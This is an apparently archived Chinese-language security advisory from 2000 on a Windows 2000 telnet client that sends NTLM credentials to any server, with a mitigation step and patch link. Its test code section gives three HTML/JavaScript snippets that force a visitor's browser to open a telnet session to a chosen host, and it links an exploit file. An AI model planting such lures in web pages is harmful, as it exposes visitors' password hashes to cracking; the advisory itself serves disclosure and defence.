Microsoft Windows 2000 telnet.exe NTLM认证漏洞发布时间:2000-07-19 更新时间:2000-07-19 严重程度:高 威胁程度:口令恢复 错误类型:设计错误 利用方式:客户机模式 受影响系统 Microsoft Windows NT 2000详细描述 在W2K下的TELNET客户程序使用NT的Challenge/Response (NTLM) 作为认证模式, 当对主机建立一个连接的时候,telnet客户程序会尝试通过NTLM来认证,而 不管主机是不是WINDOWS TELNET服务主机还是其他的。这就导致NTLM认证会话 可被监视或者破解,导致获取用户名,密码,域名等等,NTLM的challenge/response可以通过如l0phtcrack之类的工具暴力解破。 在远程主机上强迫打开一个TELNET会话是比较容易的事情,因为一些如IE,OUTLOOK,NETSCAPE NAVIGATOR等等会自动打开URL的前缀为"telnet://"地址,而自动打开TELNET客户程序。如下面的方法可以导致对一个伪造服务程序进行TELNET会话。 测试代码 1) <html> <frameset rows="100%,*"> <frame src=about:blank> <frame src=telnet://target> </frameset> </html> 2) <html> <head> <meta http-equiv="refresh" content="0;URL=telnet://target"> </head> </html> 3) <script>window.open("telnet://target")</script> http://www.securityfocus.com/data/vulnerabilities/exploits/talkntlm.cpp 解决方案 可以使用下面的方法关闭NTLM: 打开TELNET程序,在TELNET提示符下打"unset ntlm",在退出TELNET就取消了。 要验证NTLM认证是否关闭,可以按照如下的方法: 打开TELNET程序,在TELNET提示符下打"display"命令,如果你看到"Will auth (NTLM authentication"就表示TELNET会使用NTLM认证,没有看到就表示关闭了 这个程序。 下载补丁: Microsoft Windows NT 2000: Microsoft patch Q272743_W2K_SP2_x86_en http://download.microsoft.com/download/win2000platform/Patch/q272743/NT5/EN-US/Q272743_W2K_SP2_x86_en.EXE 相关信息 |
